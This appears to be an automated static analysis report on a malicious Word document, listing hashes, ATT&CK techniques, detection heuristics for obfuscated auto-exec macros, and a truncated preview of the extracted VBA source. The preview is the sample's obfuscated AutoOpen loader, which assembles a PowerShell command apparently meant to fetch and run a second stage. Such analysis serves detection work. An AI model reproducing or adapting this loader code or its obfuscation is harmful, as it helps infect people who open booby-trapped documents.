Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e2f2b3831515947e…

MALICIOUS

Office (OLE)

Size: 238.0 KB
Created: 2018-07-05 22:50:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: f46fa25feb2e25208c208e0b30a65d3c
SHA-1: 12e2e41417a206df651c2bd158267160dfd8b63f
SHA-256: e2f2b3831515947ea57ecf401e7dcfdb2c1adba2c97015f40b1b532ac5254f8b
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a shell command, likely to download and execute a second-stage payload. The script uses CreateObject and Shell() calls, indicating a high likelihood of further malicious activity.

Heuristics (8)

  • VBA macros detected (severity: medium; 5 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA.
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11778 bytes
SHA-256: 27d4603a068f2a7c90260760d1e9e99a5b47bf9c7f66bbfedf01b102184903e8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EttwormARrQqM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MprbGH = GukzU * VHpjY * Rruzl / OrKYV * wkFVL / lTHJTW + 94909 * HfGrsZ
   VGMaY = VBwAP * INtzf * QKhdfG / KGbQw * EhBXMa / WZQhs + 55135 * bziFQC
   OSwSA = HzzNE * COpsm * WAKCjC / BGatW * zWPRU / sjBbV + 27189 * fIkhG
   dHRqGY = PChYjD * GAvJvF * IYYBs / jlSfvJ * HwDVa / bsGlz + 26115 * YZFwji
   UjtoNd = ijBda * cHwaji * QCmboC / KfWwR * fmPKj / iTNWk + 38336 * wvRJVz
   wdPHVJ = PXLii * kdmmM * qlBMi / iYDZz * TnjVWJ / GHjTB + 41685 * TjjHKl
   cuwLlu = wDjEd * HonwU * tMVZo / WXwQYU * zZUbR / iYhhw + 90443 * kzXTw
pWpNbkzhAfb (GrNHJRZro + JjdzGc + auXqluUtJz)
   jzaFhw = WbKHUz * pCDzrs * oWBubn / zhCYi * DbfTv / duCTh + 31249 * PcwdNI
   zzQkkr = SpYjOq * OHdZGO * SAqfD / rwONYt * jYFZcP / Qddpl + 54580 * SzhLA
   raYLFJ = YuHim * oOXjCY * wmDUd / XwADoP * JLAGI / IJVILw + 56859 * aOZtLk
End Sub


Attribute VB_Name = "FXEhJmX"
Function GrNHJRZro()
On Error Resume Next
dvuJwm = 11463 * GGoQs / (pvbBM / 33555 - UvFXps + bZbrY / 68814 - SJnmAJ - (86906 + Osjjdh))
   rtaRIA = 78737 * Gtwvhi / (rIfXmn / 29791 - IjcjM + FPaElk / 94990 - SSRUBf - (12617 + zLkuo))
   SCYkaz = (2086 - htwTdz + YSndFY - zLhcOO) + RubmjX * CzYkz * 62464 / TQmTSc / toVzQi * NDzim + QzUhw - jWSOtG
   JkAchS = 65231 * TcvAiY / (vuAtqM / 9873 - ljFzm + vRCfR / 31774 - lHQfk - (72860 + sGfcmF))
XpEjfEqftL = "wers" + "hell  " + "       " + "       " + "  " + Chr(34) + "$" + Chr(40) + " s" + "et-i" + "tEm  "
fhFEK = 66494 * Kztjnz / (OOSmn / 51069 - vWnWvB + EjrSv / 27454 - zvBMXR - (43328 + HnbrB))
   lJCzA = 7904 * skzut / (WhPlpb / 30242 - owNjn + zlhdOq / 27580 - ijKbH - (84648 + vJljzP))
   IvZij = 67968 * RhPjL / (RCQsj / 56393 - SQZPI + iPzuD / 99797 - zYvtMi - (93652 + dUzqFR))
   vkkESO = 85352 * UvPXKt / (MHXKm / 69442 - GaGZf + dLjBF / 44948 - vjLAW - (29817 + LoVaiM))
   XjIYL = 77803 * VKZZBv / (mLjUH / 87832 - WfEja + wcYDsm / 18526 - LvbjJj - (50129 + mEvtLh))
RqjJZqiATHD = "'VaRIABL" + "E:OFS' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [St" + "RINg]" + Chr(40) + "'97" + "d50I45" + "t11d1" + "20%43X32%" + "50m10" + "4%42m3" + "9m47I32d3"
WGWEz = 20766 * SNLEGD / (jDXFw / 60678 - NUXWsp + zpccFZ / 13284 - TJUXu - (83381 + vncsn))
UFZOWVK = "8d49!101" + "V11t32d" + "49c107o1" + "8m32!39" + "%6I41" + "o44d32o" + "43V49I"
XhtNa = 94958 * vJOOo / (TszIQ / 45422 - jRCOlV + EMHKX / 37294 - docCrG - (78916 + oHGnLi))
   izodfG = 58836 * bEYKjB / (rUSqE / 40080 - YQIlc + IwKqQl / 47916 - jqFWJ - (94734 + nhiOnD))
   KYAfIm = 97565 * EVOTXi / (BdPYjN / 70808 - lkzYju + BVWPS / 7926 - uwVUb - (29790 + jXrNM))
AQHEC = "126V9" + "7d42d43" + "%2d120c98" + "V45I49" + "c49c53m1" + "27d106c" + "106%50c50" + "o50m"
sjFcZX = 40684 * ijWcui / (wcqIiM / 36887 - XfkidW + stjRwh / 60559 - nLULsa - (51572 + szkQKM))
LLziHioX = "107%" + "49c55I" + "36c46t" + "60X36d53" + "t32%60c" + "63V36X47V" + "44m41V36"
KddzV = 72235 * wFzRL / (pDqKV / 41647 - EZjOYk + fcTVIA / 41037 - OIbWLj - (4738 + fVrXI))
   JtlYG = 57191 * CmqjAk / (wrqtEi / 12462 - uMDOBD + XBKDC / 37452 - ucYOn - (16326 + YjDcT))
   ECbwF = 69501 * PZlnkU / (cIKqMp / 65203 - wKzBIA + hMphCP / 36176 - DPtRsB - (71375 + wifDM))
   Ypizoo = 83275 * prcwc / (MSjDwJ / 2921 - Twhsjt + ifnsm / 48512 - zzwWdn - (4569 + wBPPXz))
   wIrUER = 98605 * bwXrY / (DRWJbH / 51323 - YphNl + TdzfBf / 85985 - KuOPE - (23661 + UVKMb))
hAXvp = "t38d41I3" + "6X40" + "t36m10" + "7t38t42t4" + "0%106" + "!115V44t" + "61%8!35m3" + "2V6o1" + "06t5%45o" + "49m49"
NGuoai = 12058 * jZMPbv / (FtztK / 13748 - KptpaG + DkYZnP / 85930 - uGGzjI - (25156 + Wdalas))
   SWQKi = 97382 * Vschi / (pVzhi / 90099 - NUpqzT + czmih / 79066 - iomsl - (10546 + HjmGZ))
zTaoCwi = "%53I127d" + "106%106" + "X50m50%" + "50X107c" + "41!115c1" + "17m117" + "o107t" + "55V4"
GrNH
... (truncated)